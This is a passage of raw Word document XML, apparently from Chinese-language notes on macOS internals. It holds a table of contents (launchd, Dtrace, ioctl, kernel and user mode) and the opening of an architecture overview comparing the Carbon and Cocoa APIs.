                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>15.9.</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>launchd services</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc445313368 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>228</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69" w:history="1">
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>15.9.1.</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Root Service</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc445313369 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>22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70" w:history="1">
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>15.10.</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>User mode</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc445313370 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>236</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71" w:history="1">
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>15.11.</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Kernel  mode</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc445313371 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>237</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72" w:history="1">
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>16.</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Dtrace</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc445313372 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>237</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73" w:history="1">
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>16.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73 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>237</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74" w:history="1">
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>16.2.</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Dtrace-launchd-mach_msg_trap</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc445313374 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>237</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="0027225E" w:rsidRDefault="004106D2">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="630"/>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="21"/>
              <w:lang w:eastAsia="zh-CN"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc445313375" w:history="1">
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>17.</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Ioctl()</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc445313375 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>239</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="0027225E" w:rsidRDefault="004106D2">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1050"/>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="21"/>
              <w:lang w:eastAsia="zh-CN"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc445313376" w:history="1">
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>17.1.</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Overview</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc445313376 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>239</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77" w:history="1">
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>17.1.1.</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Kernel mode</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc445313377 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>239</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="0027225E" w:rsidRDefault="004106D2">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1470"/>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="21"/>
              <w:lang w:eastAsia="zh-CN"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc445313378" w:history="1">
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>17.1.2.</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>User mode</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc445313378 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>241</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="007467D0" w:rsidRDefault="007467D0">
          <w:r>
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:noProof/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w:rsidR="00D27A24" w:rsidRPr="00561B8D" w:rsidRDefault="00D27A24" w:rsidP="00561B8D"/>
    <w:p w:rsidR="00BD6FE5" w:rsidRDefault="005A53D7" w:rsidP="008C712A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc445313205"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Architecture overview</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w:rsidR="00A04C68" w:rsidRDefault="004106D2" w:rsidP="00A04C68">
      <w:hyperlink r:id="rId6" w:anchor="//apple_ref/doc/uid/TP30000905-CH1g-CACDAEDC" w:history="1">
        <w:r w:rsidR="00A04C68" w:rsidRPr="00B120E2">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://developer.apple.com/library/mac/documentation/Darwin/Conceptual/KernelProgramming/Architecture/Architecture.html#//apple_ref/doc/uid/TP30000905-CH1g-CACDAEDC</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00A04C68" w:rsidRPr="00A04C68" w:rsidRDefault="00A04C68" w:rsidP="00A04C68">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>Kernel Programming Guide</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001220CC" w:rsidRDefault="00226518" w:rsidP="008C712A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc445313206"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Architecture </w:t>
      </w:r>
      <w:r w:rsidR="00735163">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>O</w:t>
      </w:r>
      <w:r w:rsidR="005B5CFA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ver</w:t>
      </w:r>
      <w:r w:rsidR="00735163">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>view</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w:rsidR="00226518" w:rsidRDefault="00226518" w:rsidP="00226518">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7EB719B0" wp14:editId="51616075">
            <wp:extent cx="4351655" cy="1439545"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="3" name="Picture 3" descr="https://developer.apple.com/library/mac/documentation/Darwin/Conceptual/KernelProgramming/art/osx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pple.com/library/mac/documentation/Darwin/Conceptual/KernelProgramming/art/osxlayer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655" cy="1439545"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00226518" w:rsidRDefault="00226518" w:rsidP="00226518">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="003D4234">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>1</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> OSX architecture</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00226518" w:rsidRPr="00226518" w:rsidRDefault="00226518" w:rsidP="00226518">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Carbon</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Cocoa</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>X11</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>POSIX</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>JAVA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>并列成为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Mac OS X</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>五个主要的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。与</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Cocoa</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>相较之下，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Carbon</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是面向过程（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Procedural</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）的编程语言</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，而</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Cocoa</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是面向对象（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Object Oriented</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）的编程语言</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Carbon</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是比</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Cocoa</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>更为低层次的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，比较类似于微软视窗操作系统的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Win32 API</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009605F4" w:rsidRPr="005F7699" w:rsidRDefault="009605F4" w:rsidP="005F7699">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="001220CC" w:rsidRDefault="00226518" w:rsidP="008C712A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc445313207"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Mac Kernel </w:t>
